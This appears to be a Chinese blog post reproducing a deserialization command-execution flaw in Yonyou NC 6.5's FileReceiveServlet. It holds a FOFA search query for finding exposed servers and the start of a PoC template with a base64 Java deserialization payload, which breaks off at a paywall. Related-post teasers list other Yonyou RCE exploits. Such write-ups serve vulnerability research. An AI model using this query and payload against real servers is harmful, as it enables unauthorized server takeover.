用友NC_FileReceiveServlet_命令执行(含批量验证poc)

已于 2024-04-17 16:16:15 修改
阅读量60 收藏
点赞数
分类专栏: 漏洞复现 文章标签: web安全
于 2024-04-17 16:15:54 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43567873/article/details/137877595
版权

漏洞描述

用友nc6.5版本FileReceiveServlet接口存在反序列化命令执行漏洞,通过此漏洞可获取服务器权限。

image.png

漏洞复现

fofa语法:title="YONYOUNC"

使用yso生成反序列化数据后构造数据包由burp提交,生成回显判断漏洞是否存在。

image.png

TscanPoc

params: []
name: yonyou_NC_FileReceiveServlet_RCE
set:
  poc: base64Decode(b'rO0ABXNyADJzdW4ucmVmbGVjdC5hbm5vdGF0aW9uLkFubm90YXRpb25JbnZvY2F0aW9uSGFuZGxlclXK9Q8Vy36lAgACTAAMbWVtYmVyVmFsdWVzdAAPTGphdmEvdXRpbC9NYXA7TAAEdHlwZXQAEUxqYXZhL2xhbmcvQ2xhc3M7eHBzfQAAAAEADWphdmEudXRpbC5NYXB4cgAXamF2YS5sYW5nLnJlZmxlY3QuUHJveHnhJ9ogzBBDywIAAUwAAWh0ACVMamF2YS9sYW5nL3JlZmxlY3QvSW52b2NhdGlvbkhhb
了解本专栏 订阅专栏 解锁全文 超级会员免费看
今天晚上早睡觉
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
订阅专栏
用友NC FileUploadServlet 反序列化RCE漏洞复现
0xSec
12-04 1257
用友 NC nc.file.pub.imple.FileUploadServlet 反序列化漏洞,攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
用友NC Cloud存在前台远程命令执行漏洞
失心少年
07-21 567
NC Cloud是用友推出的大型企业数字化平台。 用友网络科技股份有限公司NC Cloud存在命令执行漏洞,攻击者可利用该漏洞获取服务器控制权
用友远程命令执行漏洞并提权
失心少年
10-21 877
记一次linux提权
X友NC远程命令执行
weixin_51345872的博客
09-27 1815
仅供学习参考使用,任何违法事情与本人无关
NC综合漏洞利用工具
最新发布
Python_0011的博客
03-16 945
NC综合漏洞利用工具的设计旨在简化授权项目中繁琐的步骤,并解决市面上用友NC系列漏洞工具存在的问题。目前,该工具具备以下8个主要功能:支持自定义生成脏数据序列化Payload支持命令执行支持文件上传支持注入内存马支持自定义字节码注入支持目录浏览支持4种数据库解密当选择不同漏洞类型的时候,UI会自动隐藏不适合该漏洞功能显示适合的漏洞功能。支持17种漏洞检测支持DNSLog检测支持漏洞接口检测未配置DNSLog: 只进行接口检查。配置DNSLog: 则进行DNSLog(任何DNSLog。
74CMS_6.0.48_远程命令执行_CNVD-2021-45280
02-22
本文为 漏洞编号 CNVD-2021-45280 ,即 74CMS 远程命令执行漏洞利用工具源码内容 文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 更...
POC.rar_POC_VHDL poc设计
09-20
用VHDL语言设计的poc (并行输出控制器) 用法:中断模式 和 查询模式
POC.rar_POC_POC VH_POC VHDL_POC控制器_VHDL Printer
09-24
基于VHDL的POC接口控制器,用于CPU与打印机间的数据控制
04018717_POC_Project_POC_
09-29
VIVADO 基于VERILOG写的POC程序
POC.rar_POC_POC in matlab_poC filter_poc匹配_曲线匹配
09-21
一种介绍POC匹配方法的程序,可用于划ROC曲线。
用友 GRP U8 UploadFile 命令执行漏洞
做自己喜欢的事,并将其发挥到极致!
01-23 699
用友GRP-U8是一款功能全面、灵活度高、可定制性强的ERP软件,能够协助企业实现资源的高效管理,优化企业运营流程,提升整体管理水平。该产品存在任意文件上传漏洞。
用友NC BeanShell远程命令执行(CNVD-2021-30167)漏洞复现
Redredredfish的博客
09-15 4782
漏洞简介 用友NC是一款企业级管理软件,在大中型企业广泛使用。实现建模、开发、继承、运行、管理一体化的IT解决方案信息化平台。用友 NC bsh.servlet.BshServlet目录存在远程命令执行漏洞,可通过BeanShell 执行远程命令获取服务器权限。 貌似所有版本都存在。 漏洞复现 ①FOFA上挑选一位幸运儿,访问/servlet/~ic/bsh.servlet.BshServlet目录,出现如下页面 ②Script下输入框输入命令,点击Evaluate可直接执行 执行exec("whoa
用友filereceiveservlet-fileupload-CNVD-2023-85593
qq_36334672的博客
01-25 310
用友NC6.5。
用友NC存在命令执行漏洞(CNVD-2021-30167)复现
嘟的博客
07-07 6917
漏洞说明: 2021年5月27日,国家信息安全漏洞共享平台(CNVD)公布了用友NC存在命令执行漏洞(CNVD-2021-30167),用友NC采用J2EE架构,面向大型企业集团和成长中的集团企业的信息化需求,为集团企业提供建模、开发、集成、运行、管理一体化的信息化解决方案。 2021年6月2日,用友公司发布了关于用友NC BeanShell远程代码执行漏洞的风险通告。由于用友NC对外开放了BeanShell的测试接口,未经身份验证的攻击者利用该测试接口,通过向目标服务器发送恶意构造的Http请求,在..
用友NC任意文件上传漏洞复现
Adminxe的博客
12-14 1万+
0x00 事件描述 用友NC是一款企业级管理软件,在大中型企业广泛使用。实现建模、开发、继承、运行、管理一体化的IT解决方案信息化平台。用友NC 为C/S 架构,使用JAVA编程语言开发,客户端可直接使用UClient,服务端接口为HTTP。 用友NC6.5的某个页面,存在任意文件上传漏洞。漏洞成因在于上传文件处未作类型限制,未经身份验证的攻击者可通过向目标系统发送特制数据包来利用此漏洞,成功利用此漏洞的远程攻击者可在目标系统上传任意文件执行命令。 0x01 漏洞原理 根据文档,FileRece..
【1】高危漏洞利用工具 (2023.1.6更新)-- Apt_t00ls
司徒荆的博客
01-09 1579
ATP-tools 增加CNVD-2023-00895 包括:泛微、蓝凌、用友、万户、致远、通达、中间件、安全设备等多个高位漏洞。
用友 NC bsh.servlet.BshServlet RCE利用
huangyongkang666的博客
01-09 5255
用友 NC bsh.servlet.BshServlet 远程命令执行漏洞
用友NC的一些漏洞复现
热门推荐
yzl_007的博客
12-15 1万+
用友NC的一些漏洞复现 一、BeanShell Test Servlet命令执行 漏洞介绍:用友NC是面向集团企业的管理软件,其在同类市场占有率中达到亚太第一。该漏洞是由于用友NC对外开放了BeanShell接口,攻击者可以在未授权的情况下直接访问该接口,并构造恶意数据执行任意代码并获取服务器权限。 影响范围:NC 6.5版本 复现过程: 访问对应网站后界面如下: 漏洞url就是:ip地址:端口/servlet/~ic/bsh.servlet.BshServlet 后续还可以写shell进去,但是这里不
poc_201911.class
05-12
poc_201911.class 是一个文件名,其中Poc代表了“Proof of Concept”(概念验证)的缩写,而 201911 则代表了该文件实现的时间,即 2019年11月。 Poc_201911.class 文件名通常用于计算机安全领域,特别是在进行漏洞分析和攻击研究时,以实现攻击的概念验证Poc_201911.class 文件可能包一个代码,该代码可以利用安全漏洞使得系统遭受攻击。黑客或安全研究人员使用该文件测试系统的安全性,以确保系统不会受到潜在攻击威胁。 因此,如果你发现了一个名为 Poc_201911.class 的文件在你的计算机上,你应该非常小心地处理它,并仔细检查你的系统是否存在可能的漏洞。你可能需要与安全专业人士合作以确定它是否安全。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值